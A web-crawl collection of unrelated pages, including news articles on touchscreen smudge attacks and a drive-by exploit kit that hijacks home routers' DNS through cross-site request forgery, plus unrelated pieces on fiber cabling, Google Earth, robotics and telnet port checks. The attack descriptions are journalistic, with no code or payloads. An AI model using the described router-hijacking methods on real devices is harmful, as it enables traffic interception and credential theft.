(C), and loop resistance (R), or LCR testing, the TDR method can identify and locate anomalies along a cable, identify moisture in a cable or end device, and even reveal gross problems in the cable insulation material. There are also frequency domain reflectometry (FDR) methods, reverse TDR, trending of insulation resistance (IR) measurement, and other techniques which can be used in addition to or instead of TDR and LCR to provide a wide spectrum of tools for cable condition monitoring. The three categories of techniques described in this paper are the subject of current research and development projects conducted by the author and his colleagues at the AMS Corporation with funding from the U.S. Department of Energy (DOE) under the Small Business Innovation Research (SBIR) program. © 2010 IEEE. Source AMS Corporation | Date: 2015-06-22 A drug delivery system that can be deployed from a catheter and retained within the bladder for delivery of treatment drug solutions over a period of time. The delivery system includes an inflatable or expandable delivery element that can be collapsed within the catheter tip for navigation into the bladder before being inflated or expanded within the bladder. The inflated or expanded delivery element can engage the bladder walls or sized to be too large to be passed from the bladder such that the delivery element is retained within the bladder after inflation or expansion to administer a treatment drug solution over an extended period of time. AMS Corporation | Date: 2015-02-20 Apparatus and methods are provided for treating urinary incontinence, fecal incontinence, and other pelvic defects or dysfunctions, in both males and females, using one or more lateral implants to reinforce the supportive tissue of the urethra. The implants are configured to engage and pull (e.g., pull up) pelvic tissue to cause the lateral sub-urethral tissue, such as the endopelvic fascia, to tighten and provide slack reduction for improved support. As such, certain embodiments of the implants can be utilized to eliminate the need for mesh or other supportive structures under the urethra that is common with other incontinence slings. AMS Corporation | Date: 2015-01-27 Described are devices and methods related to the needleless injection of fluid into tissue of the lower urinary tract, such as the urethra and prostate.
<urn:uuid:ec3cbbb6-edc8-4172-8dad-14241f96344b>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/ams-corporation-148336/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00372-ip-10-171-10-108.ec2.internal.warc.gz
en
0.913464
1,130
2.734375
3
Touchscreen Smudges Pose Security RiskResidual fingerprint oils on smartphones, ATMs, and other devices may reveal passwords and other confidential data, find security researchers. Prepare for a new mobile security threat: smudges. Or to be more precise, the oily residue left behind by fingers on your iPhone, Android, BlackBerry, or other touchscreen mobile device may help an attacker deduce your password. That's the message from researchers at the University of Pennsylvania, who presented a paper at this week's Usenix conference analyzing "Smudge Attacks on Smartphone Touch Screens." Based on their results, "the practice of entering sensitive information via touchscreens needs careful analysis," said the researchers. "The Android password pattern, in particular, should be strengthened." But they cautioned that any touchscreen device, including ATMs, voting machines, and PIN entry devices in retail stores, could be susceptible to smudge attacks. Touchscreens, of course, are an increasingly common feature of mobile computing devices. According to Gartner Group, 363 million touchscreen mobile devices will be sold in 2010, an increase of 97% over last year's sales. But are passwords entered via touchscreens secure? To find out, the researchers studied two different Android smartphones, the HTC G1 and the HTC Nexus1, evaluating different photography techniques for discerning a smudge pattern. With the best setup, they saw a complete smudge pattern two-thirds of the time, and could partially identify one 96% of the time. Furthermore, in ideal conditions -- say, if an attacker had physical possession of the device -- the researchers could oftentimes see finger-stroke directionality too, meaning that "the order of the strokes can be learned, and consequently, the precise patterns can be determined," they said. While Android 2.2 adds an option for alphanumeric passwords, the team tested the numbers-only password protocol, which uses a virtual nine-digit keypad and imposes certain restrictions on repeat "contact points," as well as swipe patterns. The researchers note that numeric passwords are likely to remain the norm, especially for power users who must continuously "swipe in" to their device. Given the contact point restrictions, the researchers found that "the password space of the Android password pattern contains 389,112 possible patterns." But an attacker will face a lockout -- typically, 30 seconds in duration -- after inputting an incorrect password. That would make manually entering too many passwords laborious. But by comparing smudge patterns with a dictionary of common patterns, an attacker might significantly reduce the password space. Thankfully, there's a failsafe on Android phones, since after 20 failed password attempts, a user must enter his or her Google username and password to authenticate. The good news is that for now, even with a smudge attack, an attacker typically wouldn't be able to reduce the password space to 20 or fewer possibilities. But going forward, don't rule out the possibility that enterprising attackers may add on additional techniques to help see through smudges.
<urn:uuid:68ea7a92-f0f5-4227-baed-3d64752c44f8>
CC-MAIN-2017-09
http://www.darkreading.com/vulnerabilities-and-threats/touchscreen-smudges-pose-security-risk/d/d-id/1091543
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00548-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927825
622
2.625
3
Cybercriminals have developed a Web-based attack tool to hijack routers on a large scale when users visit compromised websites or view malicious advertisements in their browsers. The goal of these attacks is to replace the DNS (Domain Name System) servers configured on routers with rogue ones controlled by attackers. This allows hackers to intercept traffic, spoof websites, hijack search queries, inject rogue ads on Web pages and more. The DNS is like the Internet’s phonebook and plays a critical role. It translates domain names, which are easy for people to remember, into numerical IP (Internet Protocol) addresses that computers need to know to communicate with each other. The DNS works in a hierarchical manner. When a user types a website’s name in a browser, the browser asks the operating system for that website’s IP address. The OS then asks the local router, which then queries the DNS servers configured on it—typically servers run by the ISP. The chain continues until the request reaches the authoritative server for the domain name in question or until a server provides that information from its cache. If attackers insert themselves in this process at any point, they can respond with a rogue IP address. This will trick the browser to look for the website on a different server; one that could, for example, host a fake version designed to steal the user’s credentials. An independent security researcher known online as Kafeine recently observed drive-by attacks launched from compromised websites that redirected users to an unusual Web-based exploit kit that was specifically designed to compromise routers. The vast majority of exploit kits sold on underground markets and used by cybercriminals target vulnerabilities in outdated browser plug-ins like Flash Player, Java, Adobe Reader or Silverlight. Their goal is to install malware on computers that don’t have the latest patches for popular software. The attacks typically work like this: Malicious code injected into compromised websites or included in rogue ads automatically redirect users’ browsers to an attack server that determines their OS, IP address, geographical location, browser type, installed plug-ins and other technical details. Based on those attributes the server then selects and launches the exploits from its arsenal that are most likely to succeed. The attacks observed by Kafeine were different. Google Chrome users were redirected to a malicious server that loaded code designed to determine the router models used by those users and to replace the DNS servers configured on the devices. Many users assume that if their routers are not set up for remote management, hackers can’t exploit vulnerabilities in their Web-based administration interfaces from the Internet, because such interfaces are only accessible from inside the local area networks. That’s false. Such attacks are possible through a technique called cross-site request forgery (CSRF) that allows a malicious website to force a user’s browser to execute rogue actions on a different website. The target website can be a router’s administration interface that’s only accessible via the local network. Many websites on the Internet have implemented defenses against CSRF, but routers generally lack such protection. The new drive-by exploit kit found by Kafeine uses CSRF to detect over 40 router models from a variety of vendors, including Asustek Computer, Belkin, D-Link, Edimax Technology, Linksys, Medialink, Microsoft, Netgear, Shenzhen Tenda Technology, TP-Link Technologies, Netis Systems, Trendnet, ZyXEL Communications and HooToo. Depending on the detected model, the attack tool tries to change the router’s DNS settings by exploiting known command injection vulnerabilities or by using common administrative credentials. It uses CSRF for this as well. If the attack is successful, the router’s primary DNS server is set to one controlled by attackers and the secondary one, which is used as a failover, is set to Google’s public DNS server. In this way, if the malicious server temporarily goes down, the router will still have a perfectly functional DNS server to resolve queries and its owner will have no reason to become suspicious and reconfigure the device. According to Kafeine, one of the vulnerabilities exploited by this attack affects routers from multiple vendors and was disclosed in February. Some vendors have released firmware updates, but the number of routers updated over the past few months is probably very low, Kafeine said. The vast majority of routers need to be updated manually through a process that requires some technical skill. That’s why many of them never get updated by their owners. Attackers know this too. In fact, some of the other vulnerabilities targeted by this exploit kit include one from 2008 and one from 2013. The attack seems to have been executed on a large scale. According to Kafeine, during the first week of May the attack server got around 250,000 unique visitors a day, with a spike to almost 1 million visitors on May 9. The most impacted countries were the U.S., Russia, Australia, Brazil and India, but the traffic distribution was more or less global. To protect themselves, users should check manufacturers’ websites periodically for firmware updates for their router models and should install them, especially if they contain security fixes. If the router allows it, they should also restrict access to the administration interface to an IP address that no device normally uses, but which they can manually assign to their computer when they need to make changes to the router’s settings.
<urn:uuid:e6f546e7-789b-411f-bb8e-dfe214c79ba4>
CC-MAIN-2017-09
http://www.itnews.com/article/2926316/large-scale-attack-hijacks-routers-through-users-browsers.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00017-ip-10-171-10-108.ec2.internal.warc.gz
en
0.933313
1,124
2.859375
3
Guide the user Interaction design takes users through a set of actions, gives reward and guides them to next steps. Inform and delight Help users feel smart. Engage them in moments of inspiration and curiosity. Design for enlightening experiences that encourage critical thinking and creative confidence. Be mindful of what users need by providing them the right tools at the right time. Be contextually aware Users move between environments (office, car, home, soccer game) and activities (walking, waiting in line, sitting, meeting) many times a day. Their changing circumstances create new contexts designers must assess and design for on a moment-to-moment basis. Design for the most desirable outcomes while keeping the shifting factors of users’ working lives in mind. Make it obvious Build on people’s existing mental models to inform interactions. Familiarity and clear, distinct choices minimize the cognitive load and enable people to concentrate on their goals. Design the “next most important action” to be inherently identifiable and easily understood based on its context with the immediate task at hand. For our users Interaction Designer Kelly Bailey talks about how the IBM Design Language gives her the freedom to focus on the big picture and the needs of her users.
<urn:uuid:ca0a4f3a-0b8a-40e4-bbb3-36fbe6a2f45b>
CC-MAIN-2017-09
https://www.ibm.com/design/language/experience/interaction/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170823.55/warc/CC-MAIN-20170219104610-00369-ip-10-171-10-108.ec2.internal.warc.gz
en
0.906676
256
2.671875
3
U.S. Military Robots Of The Future: Visual TourMeet robots that fight fires, climb ladders, search for bombs, and race across the battlefield. The technological singularity is near, say military strategists. 11 of 15 Cockroaches have a reputation for being indestructible. That could explain DASH (Dynamic Autonomous Sprawled Hexapod), a cockroach-like robot developed by the Biomimetic Millisystems Lab at University of California, Berkeley. DASH is small (10 cm) but fast (15 body lengths per second) and resilient (it can survive ground impact of 10 meters per second). Besides the creepiness factor, the crawling robots might be used as nodes on a dispersed network. Image credit: UC Berkeley Asteroid Mining Plan Revealed Google, Tech Execs Accelerate Space Privatization IRS Database System Makes Tax Deadline, Finally Air Force IT Strategy Stresses Mobile, Thin Clients Federal Cyber Overhaul Cost: $710 Million Through 2017 Inside Red Cross Social Media Command Center NASA's Blue Marble: 50 Years Of Earth Images Top 14 Government Social Media Initiatives 11 of 15
<urn:uuid:57d05500-893d-4329-8d01-f3722c623c58>
CC-MAIN-2017-09
http://www.darkreading.com/risk-management/us-military-robots-of-the-future-visual-tour/d/d-id/1104038?page_number=11
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00545-ip-10-171-10-108.ec2.internal.warc.gz
en
0.795452
244
2.703125
3
Google Earth users can do more than just fly around a virtual globe. The free mapping application can display real-time weather, help compose photographs and measure distances much more easily than its Maps cousin. To see a video version of this how-to, watch a video on YouTube. In a recent update, Google provided 3D building information for many cities. The option can be turned on in the layers panel in the bottom left corner. Sometimes the 3D information will take longer to load and render depending on connectivity. One of the useful features of the application allows photographers to see the position and strength of the sun. Click on the sun icon in the top toolbar and use the slider to change the date and time. Users can see the sun move across the sky and cast shadows on the landscape. Clicking on the wrench icon in the slider panel allows users to set the date and time, which is sometimes more efficient than using the slider. The tool doesn't account for weather, but can be useful to plan photo shoots or other activities dependent on daylight. By clicking on the clock icon users can view archived map data from decades ago. Some areas will have more archived images than others and most images in the 1990s are in black and white and are low quality. Measuring distances can be done by clicking on the ruler in the top toolbar and clicking point to point. Units of measure can be changed in the box that appears when the ruler is selected.
<urn:uuid:8b70b427-5cee-46ef-8de3-71182fa78667>
CC-MAIN-2017-09
http://www.networkworld.com/article/2167580/applications/google-earth-power-user-tips.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.905948
296
2.609375
3
With the "telnet" command you can test if a port is open Using the telnet command you can test if a port is open. You can check if a port is open in your network by issuing the telnet command. If it is open, you will see a blank screen after issuing the command: telnet [domainname or ip] [port] - [domainname or ip] is the domain name or IP address of the server to which you are trying to connect - [port] is the port number where the server is listening If the port is open, you will see a blank screen. This will mean that connection is successful. telnet rpc.acronis.com 443 (!) In Windows Vista and Windows 7 you may need to enable telnet first: - Go to Start -> Control Panel -> Programs; - Under Programs and features, click Turn Windows features on or off; - Mark both Telnet Client and Telnet Server; - Click OK. If backup to Acronis Cloud is failing, use Acronis Cloud Connection Verification Tool to check the connection.
<urn:uuid:22bea1dd-b373-44a4-ac6e-84e17dfd3428>
CC-MAIN-2017-09
https://kb.acronis.com/content/7503
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.830417
236
2.53125
3
Common Networking Standards and Why They Are Relevant Often, we don't have time to learn the reasons behind the standards we use. But learning what instigated a standard goes a long way toward not only understanding its importance, but also more easily and effectively applying it in your workplace. In this hour-long webinar, Global Knowledge instructor Keith Sorn will discuss common networking standards and explain how they were determined and why they are relevant. He will fill you in on things like why it's important to use proper color-coding standards when making cable and why the length limitations on wired cable are essential. He will also explain new standards, such as power over fiber. Keith is a computational physicist working in the IT field who splits his time between teaching at Global Knowledge and consulting. Keith teaches courses on UNIX/Linux (including writing of the kernel), programming, security and networking. He has worked with numerous and varied clients, including Lawrence Livermore National Laboratory, DoD, IBM, UNISYS and Lockheed, and he enjoys programming, penetration testing and his family life. - Why STP and UTP are twisted - Why we have five classes of addresses - Why we have an ISO OSI networking model - Why you need to know subnetting
<urn:uuid:179bd45a-2751-495f-9452-a2b70251a4ea>
CC-MAIN-2017-09
https://www.globalknowledge.com/ca-en/resources/resource-library/recorded-webinar/common-networking-standards-and-why-they-are-relevant/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00069-ip-10-171-10-108.ec2.internal.warc.gz
en
0.963944
260
2.671875
3
Zhao B.,Zhejiang University | Yang S.,Northeast Dianli University | Zhang G.,Beifang Combined Electrical Power Co. | Zhang H.,Beifang Combined Electrical Power Co. | And 6 more authors. Zhongguo Dianji Gongcheng Xuebao/Proceedings of the Chinese Society of Electrical Engineering | Year: 2013 Direct air cooling (DAC) system has been widely applied in coal-fired power plants for its water-saving rate of 69%~84%. However, in arid regions with large sandstorm, the exhaust pressure of steam turbine will be raised by 8kPa or more because of the ash fouling of air cooled condenser (ACC). If it is not timely cleaned, the coal consumption of unit would elevate above 10~15 g/(kW·h) and the pollution emissions increases in the meantime. But the water consumption for timely cleaning is restricted by environmental conditions. To solve the incompatible contradiction, a novel compressed air blower (CAB) system was designed to clean the ash fouling for ACC in this paper, that is, the compressed air will entirely replace desalted water as cleaning medium for the new system. The main body of this paper includes the basic components of the CAB system, the content and results of a site simulation test (SST) for CAB under multi-operation conditions on an ACC of 600 MW DAC unit, the blowing evaluation indexes proposed, and the quantitative correlation between the ash fouling resistance and exhaust pressure obtained by site simulation test data processing, the comparison of accumulated cleaning effects between compressed air blowing and water washing in the same cleaning period etc. The SST results of CAB system show that: the water-saving quantity per year is 1.47 kg/m2; the accumulated average exhaust pressure of steam turbine is reduced by 1.7 kPa and the coal consumption has been reduced by 2.5 g/(kW·h) compared to water washing. That is, the CAB system can accomplish three goals at the same time: water-saving, energy-saving and emission reduction. © 2013 Chinese Society for Electrical Engineering. Source
<urn:uuid:9bfc23fd-0b3c-4f23-a26b-22db6fff47f2>
CC-MAIN-2017-09
https://www.linknovate.com/affiliation/beifang-combined-electrical-power-co-1266441/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00245-ip-10-171-10-108.ec2.internal.warc.gz
en
0.923346
447
2.671875
3
The network is the computer" - at least, it is according to Sun Microsystems. Sun's John Gage coined that phrase two decades ago, which was, in hindsight, about 20 years ahead of its time. Today, breakthrough innovations, such as distributing unused computing power to create a virtual supercomputer, are steadily transforming Gage's vision into reality. There's a lot to look forward to on the horizon. Cloud computing might be the next step in the Internet's evolution. Advances in fields like nanotechnology are enabling robots to become truly ubiquitous; they may even be surprisingly helpful to government agencies confronting the baby boomer retirement wave. And at last, the keyboard and mouse may finally be on their way out - if Microsoft's new hands-on interface is the next big thing. Technology is always on the march. Here's a look at where some of it is headed. Intuitive Interface: The Power of Touch It's pretty ridiculous that we still use keyboards. It's kind of like trying to fly an F-22 fighter jet with the controls used by the Red Baron. Keyboards are unfriendly and unintuitive. But for more than a century, nobody has come up with a seriously viable alternative - until now. When Microsoft Surface debuted last year, it represented the first significant move toward a more immersive style of interface. Gone are keyboards and mice; a touch-sensitive screen replaces them. Commands are executed by touching, objects are moved by dragging and art is made by digital finger-painting. Surface's guts aren't all that impressive - a PC running Windows Vista, a projector and some cameras - packaged inside a table. What's impressive is how Microsoft organized these ordinary elements into something extraordinary. "Surface uses a series of cameras underneath the tabletop to see objects," said Kyle Warnick, group marketing manager for Microsoft Surface. "Hand gestures and touch - these user inputs are then processed with a standard Vista PC inside, and using rear projection, the input is displayed on the surface of the device." The cool part happens when the inputs are displayed. Surface completely changes the way a user interacts with a computer because it can recognize more than four-dozen simultaneous, unique touches. At the 2008 Consumer Electronics Show (CES) in Las Vegas, Microsoft, known more for force-feeding products down consumers' throats than beauty and innovation, showcased the elegance of Surface. Transferring digital photos from a camera to computer, for example, becomes as easy as dragging your finger across the surface. Photo editing is equally simple: Want the photo larger? "Grab" the corners and pull. Music files work the same way. If you have a Zune digital music player, you can organize your music as easily as CDs. But Surface is more than just an elaborate media center. The apparent limitlessness of applications is a pleasure to imagine. Microsoft initially hopes to deploy the technology in hospitality and leisure spaces; hotels and restaurants are likely candidates. As shown in Microsoft's CES demonstration, diners could eat their meals on the Surface tabletop, and along the way, the PC would recognize the specially tagged dishware and inform customers about the origins of their food and wine. Afterward, the bill would be paid on Surface by simply placing a credit card on-screen. "Right now we're focusing with our current partners - T-Mobile, Harrah's, Starwood, IGT - in the retail, leisure and entertainment industries," Warnick said. "Since announcing Surface, we've received more than 2,000 inquiries from 50 countries around the world across 25 different industries. The possibilities are endless, and we believe that over time, surface computing will be pervasive in many industries and even the public sector." How the public sector would utilize Surface remains to be seen. However, it's easy to imagine Surface in DMVs or social services offices, where customers might handle transactions through the touch interface. Other applications might be GIS-related or even, heretofore unimagined document management software. Cloud Computing: Is Software the New Hardware? Surface is all about making the user computer experience more personal and tangible. Cloud computing, on the other hand, seeks to do the opposite by taking what we do further into the digital ether. You've probably heard all the terms - grid computing, distributed computing, utility computing, cluster computing and on-demand computing. Although they don't mean the same thing, fundamentally the terms describe something similar: the concept of using another entity's infrastructure to enhance your own capability. In June 2005, Government Technology published a story on utility and grid computing titled Witnessing an Evolution. The grid is a theoretical network of devices, most of which use only a fraction of their computing power at any time. The idea - that's often practiced many times - is to concentrate that excess processing power and focus it on a large problem. Put another way, a major problem is "distributed" across a network of capacity. Stanford University's Folding@home project is one of the finest examples of distributed computing. Windows PC, Linux and Mac users, as well as Sony PlayStation 3 owners, can participate in the initiative by leaving their Internet-connected machines on standby mode when unused. Folding@home co-ops the machines' collective computing muscle to help solve the genetic riddles that plague efforts to cure diseases. Utility computing is similar in some ways and dissimilar in others. In the utility computing model, rather than randomly dispersed machines working on a single problem, randomly dispersed people access computer farms to solve their own problems. It's called utility computing because it operates like an everyday utility, such as electricity, gas, water, etc. Regardless of the exact strategy or definition in play, it all comes down to the cloud concept, which is the transformation of infrastructure to software. The machines themselves become less about performing a task and more about accessing computational power. If there was ever a philosophical goal underlying the creation of the Internet, cloud computing may be it - an infinite number of machines using an infinite number of resources to perform a task. As the Information Age rushes onward, more data is continually created. IT professionals in the public sector routinely confront the challenges associated with maintaining this data onslaught. What if, instead of routinely investing in new infrastructure, an agency could instead access a global cloud of machines to process data? Google and other industry heavyweights are already preparing for the cloud-computing era. Like Microsoft and IBM, Google has tens of thousands of machines that sit around the world. Accessing these machines unused computing power these machines would be like tapping into an enormous supercomputer capable of crunching the biggest numbers. Christophe Bisciglia, a Google software engineer, recently launched the Academic Cluster Computing Initiative. Through a partnership with IBM and the National Science Foundation, Bisciglia connects universities worldwide to Google's cloud, and along the way teaches students to think and program on a massive scale. "We started with the University of Washington, and we brought in a cluster of 40 machines, and we taught the first cluster-computing course for undergraduates," Bisciglia explained. "We used an open-source software system called Hadoop. It's an open-source distributed computing platform inspired by Google's published computing technology. It's a software system that gives you the ability to turn a cluster of hardware into a dynamic software system that allows you to manage and process large amounts of data." What's the use of clusters? As Bisciglia explained, organizations are being inundated with more and more data. Single machines become incapable of processing these vast amounts of information and eventually will fail. Buying more machines becomes unfeasible - particularly for public-sector organizations limited by budgets. "Networks are getting faster and faster. Two computers connected to each other via network are much more like a dual processor machine than they were five years ago," said Bisciglia. "So basically you need to scale out horizontally now. When you want more computational power, you can't just wait for computers to get faster; you can't just buy a faster processor. You need to add more computers in a network's configuration and interact with another cluster, rather than as a single machine." Cloud computing isn't as far off as it might initially seem. In fact, it's already happening in some respects, but it goes by yet another name: software as a service (SaaS). SaaS has been around in one form (application service provider, or ASP) or another for a while. It functions via the same principles as cloud computing. Instead of users investing in more computing infrastructure to complete tasks, they can instead access someone else's cloud to do the work. Salesforce.com has been a leader in the SaaS industry for years by hosting customer relationship management (CRM) solutions for organizations that can't or won't invest in the infrastructure to do it themselves. The company is now heavily involved in applications that extend beyond CRM, opening its cloud to anyone who wants access. Salesforce.com also offers users a platform service that lets them create their own unique applications in the cloud - and users can keep the applications for themselves or share them with others. "Platform user service really allows customers to have computing power delivered completely as a utility in the cloud," said Dan Burton, senior vice president of global public policy for Salesforce.com, "so customers can then use the cloud computing architecture to build, test, deploy and run applications in the cloud. What that really means for customers and developers is, instead of going to a preconfigured application, they can really go into the cloud, and using our programming language, APEX, they can custom build any application they want to." It may not be the stuff that cloud computing dreams are made of, but it represents the inroads that are being made into cloud computing, which are available to an IT crowd desperate to produce more with less. One obstacle to life in the clouds is security. Public-sector organizations trade heavily in sensitive data; the thought of letting that data loose in some ethereal cluster of random machines is likely to send shivers up CIOs' spines. It makes sense that early cloud activity takes place in an environment mediated by a large, established company like Salesforce.com, which is why several public-sector organizations are already taking their first steps into the cloud using Salesforce.com's tools. Mike Goodrich, the director of administration at Arlington Economic Development (AED) in Virginia, said his foray into the cloud isn't about grand ideas of having a virtual supercomputer to do his bidding. Rather, it allows his agency to do business better. AED creates economic opportunities for Arlington; generally this is accomplished by attracting tourists and businesses to the city. By putting some of its processes, such as event registration, into Salesforce's cloud, it frees IT staff to concentrate on providing better service instead of maintaining equipment. "Our IT staff has not had to invest their time, effort and money into maintaining servers," he said. "They've been able to simply know Salesforce is maintaining our data. So there's very little involvement from our infrastructure support. It's not really money saved. What it does is improve our business." It's not just Salesforce.com and Google that are investing in clouds. Amazon offers its Web Services to small businesses that need some IT muscle but can't afford to put it in-house. Amazon customers basically can run any or all of their business processes on the retailer's array of servers, using only the processing power that's needed to do the job. Nicholas Carr, former executive editor of the Harvard Business Review; author of The Big Switch; and recent keynote speaker at Government Technology's California CIO Academy in Sacramento, Calif., likens cloud computing to Alan Turing's theoretical "universal computing machine." "With enough memory and enough speed, Turing's work implies a single computer could be programmed, with software code, to do all the work that is today done by all the other physical computers in the world," Carr wrote in IT in 2018: From Turing's Machine to the Computing Cloud. "Turing's discovery that 'software can always be substituted for hardware' lies at the heart of 'virtualization,' which is the technology underpinning the great consolidation wave now reshaping big-company IT." From running day-to-day processes on far-flung corporate machines, to a global network of load-sharing clusters, the network is becoming the computer - and the clouds are on the horizon. Robotics: Nerds' Revenge? The booming nanotechnology industry is paving the way for advances in fields as diverse as cancer research and space exploration. The big science of creating such tiny things also exposes a glaring problem for industry, including the public sector: the severe shortage of new workers trained and skilled in math, science and engineering. Fortunately there is a ray of hope in the form of something else nanotechnology is revolutionizing - robots. There is plenty of conjecture about what robots will be like in five or 10 years. You can find plenty of guesses - educated and wild - about what capabilities robots will possess. What's underreported is another purpose of robots that they weren't designed for. "Because of our shortage of people entering into engineering, we've got a crisis in this country," warned Glenn Allen, professor of mechatronics engineering at Southern Polytechnic State University. "The importance of getting and recruiting our future researchers - that's where we're going to fall short." It's a familiar problem. What are organizations going to do when their knowledge base retires? Furthermore, how can businesses and government encourage the Millennial Generation to pursue careers in science and engineering, especially when all the evidence points to stagnating interest in scientific studies? The answer may be robotics. Allen is the director of the Georgia BEST Robotics program. BEST (Boosting Engineering, Science, and Technology) and FIRST (For Inspiration and Recognition of Science and Technology) are two programs designed to foster student and community interest in engineering careers. The programs hold regional competitions nationwide that bring together teams of students from all grade levels, challenging them to build robots that perform specific tasks. The goal is to move robotics away from a geeky subculture to something more akin to the local high-school football team - a lofty goal. "In middle schools and high schools, as students start getting exposed to math and the sciences, they don't see the application, and they get bored with it and don't engage," Allen said. "When the kids get involved in these robotics competitions, they realize that if they want to continue to pursue this - stuff they love, stuff that's fun, and they want to make a career out of it ... they realize math and science do have applications." It's long been known that kids love math and science - to a point. Somewhere around the 11th grade, there is a precipitous decline in the number of students participating in technical pursuits. The numbers are a bad omen for companies and organizations looking for the future work force. Allen said that despite technology's massive expansion, the number of graduates with science and engineering degrees hasn't changed significantly since the 1970s. Randy Schaeffer, regional director of New York/New Jersey FIRST, argues that a big part of the problem is the culture, as anyone familiar with IT projects can relate. "On any fall afternoon, you don't have to go too far to find 22 kids out on a big, grassy field with hundreds and hundreds of community members, cheerleaders, pep bands, coaches and a lot of hoopla," said Schaeffer. "The local papers devote pages and pages to what those kids are doing. As a result, they come away with the feeling that what they're doing is pretty cool and pretty important." Allen echoed the same concern. Students need to be motivated as if they are star athletes to stay with these pursuits, as do those who volunteer their time to help mentor students in science and engineering. "Think about football games," he said. "The coach, he gets paid to be there after school coaching those students in athletics. The robotics coaches that I know of in Georgia do it out of devotion. These guys are working every evening; they're working weekends - zero compensation in most cases. Think about the booster club for the football team, basketball team and soccer team. Where is the booster club [for areas like robotics], and where are the parents? There's not a mechanism to give these coaches the resources they need. We need to make robotics a lettering sport. We need to make it culturally acceptable." The BEST and FIRST programs are making headway. The regional FIRST competition made the front page of several California newspapers. The numbers show progress too: Kids involved in FIRST and BEST are more likely than their peers to attend college. They're more likely to attain a post-graduate degree and major in science or engineering. Changing the culturally accepted notion that athletes are cool and kids who like science are not isn't going to be easy. The roots of these perceptions reach into many facets of life. But there are signs of a shift. Pay attention to social networking sites and Web forums - the "nerdier" among us often rule the roost online. The onus to embrace math, science and engineering is as much on the community as it is on children. Hopefully it isn't too little, too late. Regardless, people like Allen and Schaeffer are doing what they can to make geek chic. And you thought all robots did was vacuum.
<urn:uuid:70cd1f2c-63de-45cb-8a74-3a05294bdf09>
CC-MAIN-2017-09
http://www.govtech.com/policy-management/102471704.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00421-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954272
3,631
2.578125
3
The 2012 observance of the International Day of Commemoration in memory of the victims of the Holocaust will focus on the theme “Children and the Holocaust”. The United Nations will remember the one-and-a-half million Jewish children who perished in the Holocaust, together with the thousands of Roma and Sinti children, the disabled and others, who suffered and died at the hands of the Nazis and their collaborators. Some children managed to survive in hiding, others fled to safe havens before it was too late, while many others suffered medical experiments or were sent to the gas chambers immediately upon arriving at the death camps. Highlighting the impact of mass violence on children, this theme has important implications for the 21st century. (United Nations Official Site) Visit “The Holocaust and the United Nations Outreach Programme” here: http://www.un.org/en/holocaustremembrance/2012/calendar2012.html. While January 27, 2012 is “International Day of Commemoration in Memory of the Victims of the Holocaust”, there are events running starting today.
<urn:uuid:ebaf4bdc-b78a-4e44-9324-2cee5cb3ee00>
CC-MAIN-2017-09
https://www.nerdsonsite.com/community-involvement/?p=191?shared=email&msg=fail
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00117-ip-10-171-10-108.ec2.internal.warc.gz
en
0.946074
227
3.640625
4
FTTH (Fiber To The Home), as its name suggests it is a fiber optic directly to the home. Specifically, FTTH refers to the optical network unit (ONU) mounted on home users or business users, is the optical access network application type of closest to users in optical access series except FTTD (fiber to the desktop). There are 5 main advantages of FTTH: First, it is a passive network, from the end to the user, the intermediate can be basically passive; Second, the bandwidth is relatively wide, long distance fits the massive use of operators; Third, because it is carried business in the fiber, and there is no problem; Fourth, because of its relatively wide bandwidth, supported protocol is more flexible; Fifth, with the development of technology, including point-to-point, 1.25G and FTTH have established relatively perfect function. Indoor optical cable is classified according to the using environment, as opposed to outdoor fiber optic cable. Indoor optical cable is a cable composed of fiber optic (optical transmission medium) after a certain process. Mainly by the optical fiber (glass fiber is as thin as hair),plastic protective tube and plastic sheath. There is no gold, silver, copper and aluminum and other metal, fiber optic cable generally has no recycling value. Indoor fiber optic cable is a certain amount of fiber optic forming to cable core according to a certain way, outsourcing jacket, and some also coated layer of protection, to achieve a communication line of light signal transmission. Indoor cable is small tensile strength, poor protective layer, but also more convenient and cheaper. Indoor cable mainly used in building wiring, and connections between network devices. Outdoor fiber optic cable, used for outdoor environment, the opposite of indoor cable. Outdoor cable is a type of communication line to achieve light signal transmission, is composed of a certain amount of fiber optic forming to cable core according to a certain way, outsourcing jacket, and some also coated with outer protective layer. Outdoor cable is mainly consists of optical fiber (glass fiber is as thin as hair), plastic protection tube and plastic sheath. There is no gold, silver, copper and aluminum and other metal cable, generally no recycling value. Outdoor cable is greater tensile strength, thick protective layer, and usually armored(wrapped in metal). Outdoor cables are mainly applied to buildings, and remote networks interconnection. Fiber optic patch cable, also known as fiber jumper, used to connect from the device to fiber optic cabling link. Fiber jumper has a thick protective layer, generally used in the connection between the fiber converter and Fiber Termination Box. Commonly used fiber jumpers include: ST, LC, FC and SC. Single-mode fiber patch cable: General single-mode fiber jumper is colored in yellow, connector and protective sleeve are blue; long transmission distance. Multi-mode fiber patch cable: general multimode fiber jumper is colored in orange and some in gray, connector and protective sleeve are beige or black and the transmission distance is short. Fiber optic jumper connector interpretation:
<urn:uuid:c76d41c8-9f25-4631-9c29-944d7022d747>
